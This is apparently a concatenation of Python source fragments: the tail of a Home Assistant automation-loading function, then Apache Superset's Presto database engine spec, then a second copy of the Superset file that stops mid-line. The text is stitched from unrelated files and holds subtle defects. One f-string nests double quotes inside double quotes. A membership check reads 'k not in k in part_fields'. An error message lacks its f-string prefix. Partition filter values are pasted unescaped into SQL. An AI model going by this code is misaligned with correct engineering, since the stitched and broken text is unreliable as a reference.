True blueprint_inputs = config_block try: raw_config = blueprint_inputs.async_substitute() config_block = cast( Dict[str, Any], await async_validate_config_item(hass, raw_config), ) except vol.Invalid as err: LOGGER.error( "Blueprint %s generated invalid automation with inputs %s: %s", blueprint_inputs.blueprint.name, blueprint_inputs.inputs, humanize_error(config_block, err), ) continue else: raw_config = cast(AutomationConfig, config_block).raw_config automation_id = config_block.get(CONF_ID) name = config_block.get(CONF_ALIAS) or f"{config_key} {list_no}" initial_state = config_block.get(CONF_INITIAL_STATE) action_script = Script( hass, config_block[CONF_ACTION], name, DOMAIN, running_description="automation actions", script_mode=config_block[CONF_MODE], max_runs=config_block[CONF_MAX], max_exceeded=config_block[CONF_MAX_EXCEEDED], logger=LOGGER, # We don't pass variables here # Automation will already render them to use them in the condition # and so will pass them on to the script. ) if CONF_CONDITION in config_block: cond_func = await _async_process_if(hass, name, config, config_block) if cond_func is None: continue else: cond_func = None # Add trigger variables to variables variables = None if CONF_TRIGGER_VARIABLES in config_block: variables = ScriptVariables( dict(config_block[CONF_TRIGGER_VARIABLES].as_dict()) ) if CONF_VARIABLES in config_block: if variables: variables.variables.update(config_block[CONF_VARIABLES].as_dict()) else: variables = config_block[CONF_VARIABLES] entity = AutomationEntity( automation_id, name, config_block[CONF_TRIGGER], cond_func, action_script, initial_state, variables, config_block.get(CONF_TRIGGER_VARIABLES), raw_config, ) entities.append(entity) if entities: await component.async_add_entities(entities) return blueprints_used async def _async_process_if(hass, name, config, p_config): """Process if checks.""" if_configs = p_config[CONF_CONDITION] checks = [] for if_config in if_configs: try: checks.append(await condition.async_from_config(hass, if_config, False)) except HomeAssistantError as ex: LOGGER.warning("Invalid condition: %s", ex) return None def if_action(variables=None): """AND all conditions.""" errors = [] for index, check in enumerate(checks): try: with trace_path(["condition", str(index)]): if not check(hass, variables): return False except ConditionError as ex: errors.append( ConditionErrorIndex( "condition", index=index, total=len(checks), error=ex ) ) if errors: LOGGER.warning( "Error evaluating condition in '%s':\n%s", name, ConditionErrorContainer("condition", errors=errors), ) return False return True if_action.config = if_configs return if_action @callback def _trigger_extract_device(trigger_conf: dict) -> str | None: """Extract devices from a trigger config.""" if trigger_conf[CONF_PLATFORM] != "device": return None return trigger_conf[CONF_DEVICE_ID] @callback def _trigger_extract_entities(trigger_conf: dict) -> list[str]: """Extract entities from a trigger config.""" if trigger_conf[CONF_PLATFORM] in ("state", "numeric_state"): return trigger_conf[CONF_ENTITY_ID] if trigger_conf[CONF_PLATFORM] == "zone": return trigger_conf[CONF_ENTITY_ID] + [trigger_conf[CONF_ZONE]] if trigger_conf[CONF_PLATFORM] == "geo_location": return [trigger_conf[CONF_ZONE]] if trigger_conf[CONF_PLATFORM] == "sun": return ["sun.sun"] return []
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=C,R,W from collections import OrderedDict from datetime import datetime from distutils.version import StrictVersion import logging import re import textwrap import time from typing import Any, Dict, List, Optional, Set, Tuple from urllib import parse from sqlalchemy import Column, literal_column from sqlalchemy.engine.base import Engine from sqlalchemy.engine.reflection import Inspector from sqlalchemy.engine.result import RowProxy from sqlalchemy.sql.expression import ColumnClause, Select from superset import is_feature_enabled from superset.db_engine_specs.base import BaseEngineSpec from superset.exceptions import SupersetTemplateException from superset.models.sql_types.presto_sql_types import type_map as presto_type_map from superset.utils import core as utils QueryStatus = utils.QueryStatus class PrestoEngineSpec(BaseEngineSpec): engine = "presto" _time_grain_functions = { None: "{col}", "PT1S": "date_trunc('second', CAST({col} AS TIMESTAMP))", "PT1M": "date_trunc('minute', CAST({col} AS TIMESTAMP))", "PT1H": "date_trunc('hour', CAST({col} AS TIMESTAMP))", "P1D": "date_trunc('day', CAST({col} AS TIMESTAMP))", "P1W": "date_trunc('week', CAST({col} AS TIMESTAMP))", "P1M": "date_trunc('month', CAST({col} AS TIMESTAMP))", "P0.25Y": "date_trunc('quarter', CAST({col} AS TIMESTAMP))", "P1Y": "date_trunc('year', CAST({col} AS TIMESTAMP))", "P1W/1970-01-03T00:00:00Z": "date_add('day', 5, date_trunc('week', " "date_add('day', 1, CAST({col} AS TIMESTAMP))))", "1969-12-28T00:00:00Z/P1W": "date_add('day', -1, date_trunc('week', " "date_add('day', 1, CAST({col} AS TIMESTAMP))))", } @classmethod def get_view_names(cls, inspector: Inspector, schema: Optional[str]) -> List[str]: """Returns an empty list get_table_names() function returns all table names and view names, and get_view_names() is not implemented in sqlalchemy_presto.py https://github.com/dropbox/PyHive/blob/e25fc8440a0686bbb7a5db5de7cb1a77bdb4167a/pyhive/sqlalchemy_presto.py """ return [] @classmethod def _create_column_info(cls, name: str, data_type: str) -> dict: """ Create column info object :param name: column name :param data_type: column data type :return: column info object """ return {"name": name, "type": f"{data_type}"} @classmethod def _get_full_name(cls, names: List[Tuple[str, str]]) -> str: """ Get the full column name :param names: list of all individual column names :return: full column name """ return ".".join(column[0] for column in names if column[0]) @classmethod def _has_nested_data_types(cls, component_type: str) -> bool: """ Check if string contains a data type. We determine if there is a data type by whitespace or multiple data types by commas :param component_type: data type :return: boolean """ comma_regex = r",(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" white_space_regex = r"\s(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" return ( re.search(comma_regex, component_type) is not None or re.search(white_space_regex, component_type) is not None ) @classmethod def _split_data_type(cls, data_type: str, delimiter: str) -> List[str]: """ Split data type based on given delimiter. Do not split the string if the delimiter is enclosed in quotes :param data_type: data type :param delimiter: string separator (i.e. open parenthesis, closed parenthesis, comma, whitespace) :return: list of strings after breaking it by the delimiter """ return re.split( r"{}(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)".format(delimiter), data_type ) @classmethod def _parse_structural_column( cls, parent_column_name: str, parent_data_type: str, result: List[dict] ) -> None: """ Parse a row or array column :param result: list tracking the results """ formatted_parent_column_name = parent_column_name # Quote the column name if there is a space if " " in parent_column_name: formatted_parent_column_name = f'"{parent_column_name}"' full_data_type = f"{formatted_parent_column_name} {parent_data_type}" original_result_len = len(result) # split on open parenthesis ( to get the structural # data type and its component types data_types = cls._split_data_type(full_data_type, r"\(") stack: List[Tuple[str, str]] = [] for data_type in data_types: # split on closed parenthesis ) to track which component # types belong to what structural data type inner_types = cls._split_data_type(data_type, r"\)") for inner_type in inner_types: # We have finished parsing multiple structural data types if not inner_type and len(stack) > 0: stack.pop() elif cls._has_nested_data_types(inner_type): # split on comma , to get individual data types single_fields = cls._split_data_type(inner_type, ",") for single_field in single_fields: single_field = single_field.strip() # If component type starts with a comma, the first single field # will be an empty string. Disregard this empty string. if not single_field: continue # split on whitespace to get field name and data type field_info = cls._split_data_type(single_field, r"\s") # check if there is a structural data type within # overall structural data type if field_info[1] == "array" or field_info[1] == "row": stack.append((field_info[0], field_info[1])) full_parent_path = cls._get_full_name(stack) result.append( cls._create_column_info( full_parent_path, presto_type_map[field_info[1]]() ) ) else: # otherwise this field is a basic data type full_parent_path = cls._get_full_name(stack) column_name = "{}.{}".format( full_parent_path, field_info[0] ) result.append( cls._create_column_info( column_name, presto_type_map[field_info[1]]() ) ) # If the component type ends with a structural data type, do not pop # the stack. We have run across a structural data type within the # overall structural data type. Otherwise, we have completely parsed # through the entire structural data type and can move on. if not (inner_type.endswith("array") or inner_type.endswith("row")): stack.pop() # We have an array of row objects (i.e. array(row(...))) elif "array" == inner_type or "row" == inner_type: # Push a dummy object to represent the structural data type stack.append(("", inner_type)) # We have an array of a basic data types(i.e. array(varchar)). elif len(stack) > 0: # Because it is an array of a basic data type. We have finished # parsing the structural data type and can move on. stack.pop() # Unquote the column name if necessary if formatted_parent_column_name != parent_column_name: for index in range(original_result_len, len(result)): result[index]["name"] = result[index]["name"].replace( formatted_parent_column_name, parent_column_name ) @classmethod def _show_columns( cls, inspector: Inspector, table_name: str, schema: Optional[str] ) -> List[RowProxy]: """ Show presto column names :param inspector: object that performs database schema inspection :param table_name: table name :param schema: schema name :return: list of column objects """ quote = inspector.engine.dialect.identifier_preparer.quote_identifier full_table = quote(table_name) if schema: full_table = "{}.{}".format(quote(schema), full_table) columns = inspector.bind.execute("SHOW COLUMNS FROM {}".format(full_table)) return columns @classmethod def get_columns( cls, inspector: Inspector, table_name: str, schema: Optional[str] ) -> List[Dict[str, Any]]: """ Get columns from a Presto data source. This includes handling row and array data types :param inspector: object that performs database schema inspection :param table_name: table name :param schema: schema name :return: a list of results that contain column info (i.e. column name and data type) """ columns = cls._show_columns(inspector, table_name, schema) result: List[dict] = [] for column in columns: try: # parse column if it is a row or array if is_feature_enabled("PRESTO_EXPAND_DATA") and ( "array" in column.Type or "row" in column.Type ): structural_column_index = len(result) cls._parse_structural_column(column.Column, column.Type, result) result[structural_column_index]["nullable"] = getattr( column, "Null", True ) result[structural_column_index]["default"] = None continue else: # otherwise column is a basic data type column_type = presto_type_map[column.Type]() except KeyError: logging.info( "Did not recognize type {} of column {}".format( column.Type, column.Column ) ) column_type = "OTHER" column_info = cls._create_column_info(column.Column, column_type) column_info["nullable"] = getattr(column, "Null", True) column_info["default"] = None result.append(column_info) return result @classmethod def _is_column_name_quoted(cls, column_name: str) -> bool: """ Check if column name is in quotes :param column_name: column name :return: boolean """ return column_name.startswith('"') and column_name.endswith('"') @classmethod def _get_fields(cls, cols: List[dict]) -> List[ColumnClause]: """ Format column clauses where names are in quotes and labels are specified :param cols: columns :return: column clauses """ column_clauses = [] # Column names are separated by periods. This regex will find periods in a # string if they are not enclosed in quotes because if a period is enclosed in # quotes, then that period is part of a column name. dot_pattern = r"""\. # split on period (?= # look ahead (?: # create non-capture group [^\"]*\"[^\"]*\" # two quotes )*[^\"]*$) # end regex""" dot_regex = re.compile(dot_pattern, re.VERBOSE) for col in cols: # get individual column names col_names = re.split(dot_regex, col["name"]) # quote each column name if it is not already quoted for index, col_name in enumerate(col_names): if not cls._is_column_name_quoted(col_name): col_names[index] = '"{}"'.format(col_name) quoted_col_name = ".".join( col_name if cls._is_column_name_quoted(col_name) else f'"{col_name}"' for col_name in col_names ) # create column clause in the format "name"."name" AS "name.name" column_clause = literal_column(quoted_col_name).label(col["name"]) column_clauses.append(column_clause) return column_clauses @classmethod def _filter_out_array_nested_cols( cls, cols: List[dict] ) -> Tuple[List[dict], List[dict]]: """ Filter out columns that correspond to array content. We know which columns to skip because cols is a list provided to us in a specific order where a structural column is positioned right before its content. Example: Column Name: ColA, Column Data Type: array(row(nest_obj int)) cols = [ ..., ColA, ColA.nest_obj, ... ] When we run across an array, check if subsequent column names start with the array name and skip them. :param cols: columns :return: filtered list of columns and list of array columns and its nested fields """ filtered_cols = [] array_cols = [] curr_array_col_name = None for col in cols: # col corresponds to an array's content and should be skipped if curr_array_col_name and col["name"].startswith(curr_array_col_name): array_cols.append(col) continue # col is an array so we need to check if subsequent # columns correspond to the array's contents elif str(col["type"]) == "ARRAY": curr_array_col_name = col["name"] array_cols.append(col) filtered_cols.append(col) else: curr_array_col_name = None filtered_cols.append(col) return filtered_cols, array_cols @classmethod def select_star( cls, database, table_name: str, engine: Engine, schema: str = None, limit: int = 100, show_cols: bool = False, indent: bool = True, latest_partition: bool = True, cols: Optional[List[Dict[str, Any]]] = None, ) -> str: """ Include selecting properties of row objects. We cannot easily break arrays into rows, so render the whole array in its own row and skip columns that correspond to an array's contents. """ cols = cols or [] presto_cols = cols if is_feature_enabled("PRESTO_EXPAND_DATA") and show_cols: dot_regex = r"\.(?=(?:[^\"]*\"[^\"]*\")*[^\"]*$)" presto_cols = [ col for col in presto_cols if not re.search(dot_regex, col["name"]) ] return super().select_star( database, table_name, engine, schema, limit, show_cols, indent, latest_partition, presto_cols, ) @classmethod def adjust_database_uri(cls, uri, selected_schema=None): database = uri.database if selected_schema and database: selected_schema = parse.quote(selected_schema, safe="") if "/" in database: database = database.split("/")[0] + "/" + selected_schema else: database += "/" + selected_schema uri.database = database return uri @classmethod def convert_dttm(cls, target_type: str, dttm: datetime) -> str: tt = target_type.upper() if tt == "DATE": return "from_iso8601_date('{}')".format(dttm.isoformat()[:10]) if tt == "TIMESTAMP": return "from_iso8601_timestamp('{}')".format(dttm.isoformat()) return "'{}'".format(dttm.strftime("%Y-%m-%d %H:%M:%S")) @classmethod def epoch_to_dttm(cls) -> str: return "from_unixtime({col})" @classmethod def get_all_datasource_names( cls, db, datasource_type: str ) -> List[utils.DatasourceName]: datasource_df = db.get_df( "SELECT table_schema, table_name FROM INFORMATION_SCHEMA.{}S " "ORDER BY concat(table_schema, '.', table_name)".format( datasource_type.upper() ), None, ) datasource_names: List[utils.DatasourceName] = [] for unused, row in datasource_df.iterrows(): datasource_names.append( utils.DatasourceName( schema=row["table_schema"], table=row["table_name"] ) ) return datasource_names @classmethod def _build_column_hierarchy( cls, columns: List[dict], parent_column_types: List[str], column_hierarchy: dict ) -> None: """ Build a graph where the root node represents a column whose data type is in parent_column_types. A node's children represent that column's nested fields :param columns: list of columns :param parent_column_types: list of data types that decide what columns can be root nodes :param column_hierarchy: dictionary representing the graph """ if len(columns) == 0: return root = columns.pop(0) root_info = {"type": root["type"], "children": []} column_hierarchy[root["name"]] = root_info while columns: column = columns[0] # If the column name does not start with the root's name, # then this column is not a nested field if not column["name"].startswith(f"{root["name"]}."): break # If the column's data type is one of the parent types, # then this column may have nested fields if str(column["type"]) in parent_column_types: cls._build_column_hierarchy( columns, parent_column_types, column_hierarchy ) root_info["children"].append(column["name"]) continue else: # The column is a nested field root_info["children"].append(column["name"]) columns.pop(0) @classmethod def _create_row_and_array_hierarchy( cls, selected_columns: List[dict] ) -> Tuple[dict, dict, List[dict]]: """ Build graphs where the root node represents a row or array and its children are that column's nested fields :param selected_columns: columns selected in a query :return: graph representing a row, graph representing an array, and a list of all the nested fields """ row_column_hierarchy: OrderedDict = OrderedDict() array_column_hierarchy: OrderedDict = OrderedDict() expanded_columns: List[dict] = [] for column in selected_columns: if column["type"].startswith("ROW"): parsed_row_columns: List[dict] = [] cls._parse_structural_column( column["name"], column["type"].lower(), parsed_row_columns ) expanded_columns = expanded_columns + parsed_row_columns[1:] filtered_row_columns, array_columns = cls._filter_out_array_nested_cols( parsed_row_columns ) cls._build_column_hierarchy( filtered_row_columns, ["ROW"], row_column_hierarchy ) cls._build_column_hierarchy( array_columns, ["ROW", "ARRAY"], array_column_hierarchy ) elif column["type"].startswith("ARRAY"): parsed_array_columns: List[dict] = [] cls._parse_structural_column( column["name"], column["type"].lower(), parsed_array_columns ) expanded_columns = expanded_columns + parsed_array_columns[1:] cls._build_column_hierarchy( parsed_array_columns, ["ROW", "ARRAY"], array_column_hierarchy ) return row_column_hierarchy, array_column_hierarchy, expanded_columns @classmethod def _create_empty_row_of_data(cls, columns: List[dict]) -> dict: """ Create an empty row of data :param columns: list of columns :return: dictionary representing an empty row of data """ return {column["name"]: "" for column in columns} @classmethod def _expand_row_data(cls, datum: dict, column: str, column_hierarchy: dict) -> None: """ Separate out nested fields and its value in a row of data :param datum: row of data :param column: row column name :param column_hierarchy: dictionary tracking structural columns and its nested fields """ if column in datum: row_data = datum[column] row_children = column_hierarchy[column]["children"] if row_data and len(row_data) != len(row_children): raise Exception( "The number of data values and number of nested" "fields are not equal" ) elif row_data: for index, data_value in enumerate(row_data): datum[row_children[index]] = data_value else: for row_child in row_children: datum[row_child] = "" @classmethod def _split_array_columns_by_process_state( cls, array_columns: List[str], array_column_hierarchy: dict, datum: dict ) -> Tuple[List[str], Set[str]]: """ Take a list of array columns and split them according to whether or not we are ready to process them from a data set :param array_columns: list of array columns :param array_column_hierarchy: graph representing array columns :param datum: row of data :return: list of array columns ready to be processed and set of array columns not ready to be processed """ array_columns_to_process = [] unprocessed_array_columns = set() child_array = None for array_column in array_columns: if array_column in datum: array_columns_to_process.append(array_column) elif str(array_column_hierarchy[array_column]["type"]) == "ARRAY": child_array = array_column unprocessed_array_columns.add(child_array) elif child_array and array_column.startswith(child_array): unprocessed_array_columns.add(array_column) else: # array without any data array_columns_to_process.append(array_column) datum[array_column] = [] return array_columns_to_process, unprocessed_array_columns @classmethod def _convert_data_list_to_array_data_dict( cls, data: List[dict], array_columns_to_process: List[str] ) -> dict: """ Pull out array data from rows of data into a dictionary where the key represents the index in the data list and the value is the array data values Example: data = [ {'ColumnA': [1, 2], 'ColumnB': 3}, {'ColumnA': [11, 22], 'ColumnB': 3} ] data dictionary = { 0: [{'ColumnA': [1, 2]], 1: [{'ColumnA': [11, 22]] } :param data: rows of data :param array_columns_to_process: array columns we want to pull out :return: data dictionary """ array_data_dict = {} for data_index, datum in enumerate(data): all_array_datum = {} for array_column in array_columns_to_process: all_array_datum[array_column] = datum[array_column] array_data_dict[data_index] = [all_array_datum] return array_data_dict @classmethod def _process_array_data( cls, data: List[dict], all_columns: List[dict], array_column_hierarchy: dict ) -> dict: """ Pull out array data that is ready to be processed into a dictionary. The key refers to the index in the original data set. The value is a list of data values. Initially this list will contain just one value, the row of data that corresponds to the index in the original data set. As we process arrays, we will pull out array values into separate rows and append them to the list of data values. Example: Original data set = [ {'ColumnA': [1, 2], 'ColumnB': [3]}, {'ColumnA': [11, 22], 'ColumnB': [33]} ] all_array_data (initially) = { 0: [{'ColumnA': [1, 2], 'ColumnB': [3}], 1: [{'ColumnA': [11, 22], 'ColumnB': [33]}] } all_array_data (after processing) = { 0: [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, ], 1: [ {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ], } :param data: rows of data :param all_columns: list of columns :param array_column_hierarchy: graph representing array columns :return: dictionary representing processed array data """ array_columns = list(array_column_hierarchy.keys()) # Determine what columns are ready to be processed. This is necessary for # array columns that contain rows with nested arrays. We first process # the outer arrays before processing inner arrays. array_columns_to_process, unprocessed_array_columns = cls._split_array_columns_by_process_state( array_columns, array_column_hierarchy, data[0] ) # Pull out array data that is ready to be processed into a dictionary. all_array_data = cls._convert_data_list_to_array_data_dict( data, array_columns_to_process ) for original_data_index, expanded_array_data in all_array_data.items(): for array_column in array_columns: if array_column in unprocessed_array_columns: continue # Expand array values that are rows if str(array_column_hierarchy[array_column]["type"]) == "ROW": for array_value in expanded_array_data: cls._expand_row_data( array_value, array_column, array_column_hierarchy ) continue array_data = expanded_array_data[0][array_column] array_children = array_column_hierarchy[array_column] # This is an empty array of primitive data type if not array_data and not array_children["children"]: continue # Pull out complex array values into its own row of data elif array_data and array_children["children"]: for array_index, data_value in enumerate(array_data): if array_index >= len(expanded_array_data): empty_data = cls._create_empty_row_of_data(all_columns) expanded_array_data.append(empty_data) for index, datum_value in enumerate(data_value): array_child = array_children["children"][index] expanded_array_data[array_index][array_child] = datum_value # Pull out primitive array values into its own row of data elif array_data: for array_index, data_value in enumerate(array_data): if array_index >= len(expanded_array_data): empty_data = cls._create_empty_row_of_data(all_columns) expanded_array_data.append(empty_data) expanded_array_data[array_index][array_column] = data_value # This is an empty array with nested fields else: for index, array_child in enumerate(array_children["children"]): for array_value in expanded_array_data: array_value[array_child] = "" return all_array_data @classmethod def _consolidate_array_data_into_data( cls, data: List[dict], array_data: dict ) -> None: """ Consolidate data given a list representing rows of data and a dictionary representing expanded array data Example: Original data set = [ {'ColumnA': [1, 2], 'ColumnB': [3]}, {'ColumnA': [11, 22], 'ColumnB': [33]} ] array_data = { 0: [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, ], 1: [ {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ], } Final data set = [ {'ColumnA': 1, 'ColumnB': 3}, {'ColumnA': 2, 'ColumnB': ''}, {'ColumnA': 11, 'ColumnB': 33}, {'ColumnA': 22, 'ColumnB': ''}, ] :param data: list representing rows of data :param array_data: dictionary representing expanded array data :return: list where data and array_data are combined """ data_index = 0 original_data_index = 0 while data_index < len(data): data[data_index].update(array_data[original_data_index][0]) array_data[original_data_index].pop(0) data[data_index + 1 : data_index + 1] = array_data[original_data_index] data_index = data_index + len(array_data[original_data_index]) + 1 original_data_index = original_data_index + 1 @classmethod def _remove_processed_array_columns( cls, unprocessed_array_columns: Set[str], array_column_hierarchy: dict ) -> None: """ Remove keys representing array columns that have already been processed :param unprocessed_array_columns: list of unprocessed array columns :param array_column_hierarchy: graph representing array columns """ array_columns = list(array_column_hierarchy.keys()) for array_column in array_columns: if array_column in unprocessed_array_columns: continue else: del array_column_hierarchy[array_column] @classmethod def expand_data( cls, columns: List[dict], data: List[dict] ) -> Tuple[List[dict], List[dict], List[dict]]: """ We do not immediately display rows and arrays clearly in the data grid. This method separates out nested fields and data values to help clearly display structural columns. Example: ColumnA is a row(nested_obj varchar) and ColumnB is an array(int) Original data set = [ {'ColumnA': ['a1'], 'ColumnB': [1, 2]}, {'ColumnA': ['a2'], 'ColumnB': [3, 4]}, ] Expanded data set = [ {'ColumnA': ['a1'], 'ColumnA.nested_obj': 'a1', 'ColumnB': 1}, {'ColumnA': '', 'ColumnA.nested_obj': '', 'ColumnB': 2}, {'ColumnA': ['a2'], 'ColumnA.nested_obj': 'a2', 'ColumnB': 3}, {'ColumnA': '', 'ColumnA.nested_obj': '', 'ColumnB': 4}, ] :param columns: columns selected in the query :param data: original data set :return: list of all columns(selected columns and their nested fields), expanded data set, listed of nested fields """ if not is_feature_enabled("PRESTO_EXPAND_DATA"): return columns, data, [] all_columns: List[dict] = [] # Get the list of all columns (selected fields and their nested fields) for column in columns: if column["type"].startswith("ARRAY") or column["type"].startswith("ROW"): cls._parse_structural_column( column["name"], column["type"].lower(), all_columns ) else: all_columns.append(column) # Build graphs where the root node is a row or array and its children are that # column's nested fields row_column_hierarchy, array_column_hierarchy, expanded_columns = cls._create_row_and_array_hierarchy( columns ) # Pull out a row's nested fields and their values into separate columns ordered_row_columns = row_column_hierarchy.keys() for datum in data: for row_column in ordered_row_columns: cls._expand_row_data(datum, row_column, row_column_hierarchy) while array_column_hierarchy: array_columns = list(array_column_hierarchy.keys()) # Determine what columns are ready to be processed. array_columns_to_process, unprocessed_array_columns = cls._split_array_columns_by_process_state( array_columns, array_column_hierarchy, data[0] ) all_array_data = cls._process_array_data( data, all_columns, array_column_hierarchy ) # Consolidate the original data set and the expanded array data cls._consolidate_array_data_into_data(data, all_array_data) # Remove processed array columns from the graph cls._remove_processed_array_columns( unprocessed_array_columns, array_column_hierarchy ) return all_columns, data, expanded_columns @classmethod def extra_table_metadata( cls, database, table_name: str, schema_name: str ) -> Dict[str, Any]: indexes = database.get_indexes(table_name, schema_name) if not indexes: return {} cols = indexes[0].get("column_names", []) full_table_name = table_name if schema_name and "." not in table_name: full_table_name = "{}.{}".format(schema_name, table_name) pql = cls._partition_query(full_table_name, database) col_names, latest_parts = cls.latest_partition( table_name, schema_name, database, show_first=True ) latest_parts = latest_parts or tuple([None] * len(col_names)) return { "partitions": { "cols": cols, "latest": dict(zip(col_names, latest_parts)), "partitionQuery": pql, } } @classmethod def handle_cursor(cls, cursor, query, session): """Updates progress information""" query_id = query.id logging.info(f"Query {query_id}: Polling the cursor for progress") polled = cursor.poll() # poll returns dict -- JSON status information or ``None`` # if the query is done # https://github.com/dropbox/PyHive/blob/ # b34bdbf51378b3979eaf5eca9e956f06ddc36ca0/pyhive/presto.py#L178 while polled: # Update the object and wait for the kill signal. stats = polled.get("stats", {}) query = session.query(type(query)).filter_by(id=query_id).one() if query.status in [QueryStatus.STOPPED, QueryStatus.TIMED_OUT]: cursor.cancel() break if stats: state = stats.get("state") # if already finished, then stop polling if state == "FINISHED": break completed_splits = float(stats.get("completedSplits")) total_splits = float(stats.get("totalSplits")) if total_splits and completed_splits: progress = 100 * (completed_splits / total_splits) logging.info( "Query {} progress: {} / {} " "splits".format(query_id, completed_splits, total_splits) ) if progress > query.progress: query.progress = progress session.commit() time.sleep(1) logging.info(f"Query {query_id}: Polling the cursor for progress") polled = cursor.poll() @classmethod def _extract_error_message(cls, e): if ( hasattr(e, "orig") and type(e.orig).__name__ == "DatabaseError" and isinstance(e.orig[0], dict) ): error_dict = e.orig[0] return "{} at {}: {}".format( error_dict.get("errorName"), error_dict.get("errorLocation"), error_dict.get("message"), ) if ( type(e).__name__ == "DatabaseError" and hasattr(e, "args") and len(e.args) > 0 ): error_dict = e.args[0] return error_dict.get("message") return utils.error_msg_from_exception(e) @classmethod def _partition_query( cls, table_name, database, limit=0, order_by=None, filters=None ): """Returns a partition query :param table_name: the name of the table to get partitions from :type table_name: str :param limit: the number of partitions to be returned :type limit: int :param order_by: a list of tuples of field name and a boolean that determines if that field should be sorted in descending order :type order_by: list of (str, bool) tuples :param filters: dict of field name and filter value combinations """ limit_clause = "LIMIT {}".format(limit) if limit else "" order_by_clause = "" if order_by: l = [] # noqa: E741 for field, desc in order_by: l.append(field + " DESC" if desc else "") order_by_clause = "ORDER BY " + ", ".join(l) where_clause = "" if filters: l = [] # noqa: E741 for field, value in filters.items(): l.append(f"{field} = '{value}'") where_clause = "WHERE " + " AND ".join(l) presto_version = database.get_extra().get("version") # Partition select syntax changed in v0.199, so check here. # Default to the new syntax if version is unset. partition_select_clause = ( f'SELECT * FROM "{table_name}$partitions"' if not presto_version or StrictVersion(presto_version) >= StrictVersion("0.199") else f"SHOW PARTITIONS FROM {table_name}" ) sql = textwrap.dedent( f"""\ {partition_select_clause} {where_clause} {order_by_clause} {limit_clause} """ ) return sql @classmethod def where_latest_partition( cls, table_name: str, schema: str, database, query: Select, columns: Optional[List] = None, ) -> Optional[Select]: try: col_names, values = cls.latest_partition( table_name, schema, database, show_first=True ) except Exception: # table is not partitioned return None if values is None: return None column_names = {column.get("name") for column in columns or []} for col_name, value in zip(col_names, values): if col_name in column_names: query = query.where(Column(col_name) == value) return query @classmethod def _latest_partition_from_df(cls, df) -> Optional[List[str]]: if not df.empty: return df.to_records(index=False)[0].item() return None @classmethod def latest_partition( cls, table_name: str, schema: str, database, show_first: bool = False ): """Returns col name and the latest (max) partition value for a table :param table_name: the name of the table :param schema: schema / database / namespace :param database: database query will be run against :type database: models.Database :param show_first: displays the value for the first partitioning key if there are many partitioning keys :type show_first: bool >>> latest_partition('foo_table') (['ds'], ('2018-01-01',)) """ indexes = database.get_indexes(table_name, schema) if len(indexes[0]["column_names"]) < 1: raise SupersetTemplateException( "The table should have one partitioned field" ) elif not show_first and len(indexes[0]["column_names"]) > 1: raise SupersetTemplateException( "The table should have a single partitioned field " "to use this function. You may want to use " "`presto.latest_sub_partition`" ) column_names = indexes[0]["column_names"] part_fields = [(column_name, True) for column_name in column_names] sql = cls._partition_query(table_name, database, 1, part_fields) df = database.get_df(sql, schema) return column_names, cls._latest_partition_from_df(df) @classmethod def latest_sub_partition(cls, table_name, schema, database, **kwargs): """Returns the latest (max) partition value for a table A filtering criteria should be passed for all fields that are partitioned except for the field to be returned. For example, if a table is partitioned by (``ds``, ``event_type`` and ``event_category``) and you want the latest ``ds``, you'll want to provide a filter as keyword arguments for both ``event_type`` and ``event_category`` as in ``latest_sub_partition('my_table', event_category='page', event_type='click')`` :param table_name: the name of the table, can be just the table name or a fully qualified table name as ``schema_name.table_name`` :type table_name: str :param schema: schema / database / namespace :type schema: str :param database: database query will be run against :type database: models.Database :param kwargs: keyword arguments define the filtering criteria on the partition list. There can be many of these. :type kwargs: str >>> latest_sub_partition('sub_partition_table', event_type='click') '2018-01-01' """ indexes = database.get_indexes(table_name, schema) part_fields = indexes[0]["column_names"] for k in kwargs.keys(): if k not in k in part_fields: msg = "Field [{k}] is not part of the portioning key" raise SupersetTemplateException(msg) if len(kwargs.keys()) != len(part_fields) - 1: msg = ( "A filter needs to be specified for {} out of the " "{} fields." ).format(len(part_fields) - 1, len(part_fields)) raise SupersetTemplateException(msg) for field in part_fields: if field not in kwargs.keys(): field_to_return = field sql = cls._partition_query( table_name, database, 1, [(field_to_return, True)], kwargs ) df = database.get_df(sql, schema) if df.empty: return "" return df.to_dict()[field_to_return][0]
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=C,R,W from collections import OrderedDict from datetime import datetime from distutils.version import StrictVersion import logging import re import textwrap import time from typing import Any, Dict, List, Optional, Set, Tuple from urllib import parse from sqlalchemy import Column, literal_column from sqlalchemy.engine.base import Engine from sqlalchemy.engine.reflection import Inspector from sqlalchemy.engine.result import RowProxy from sqlalchemy.sql.expression import ColumnClause, Select from superset import is_feature_enabled from superset.db_engine_specs.base import BaseEngineSpec from superset.exceptions import SupersetTemplateException from superset.models.sql_types.presto_sql_types import type_map as presto_type_map from superset.utils import core as utils QueryStatus = utils.QueryStatus class PrestoEngineSpec(BaseEngineSpec): engine = "presto" _time_grain_functions = { None: "{col}", "PT1S": "date_trunc('second', CAST({col} AS TIMESTAMP))", "PT1M": "date_trunc('minute', CAST({col} AS TIMESTAMP))", "PT1H": "date_trunc('hour', CAST({col} AS 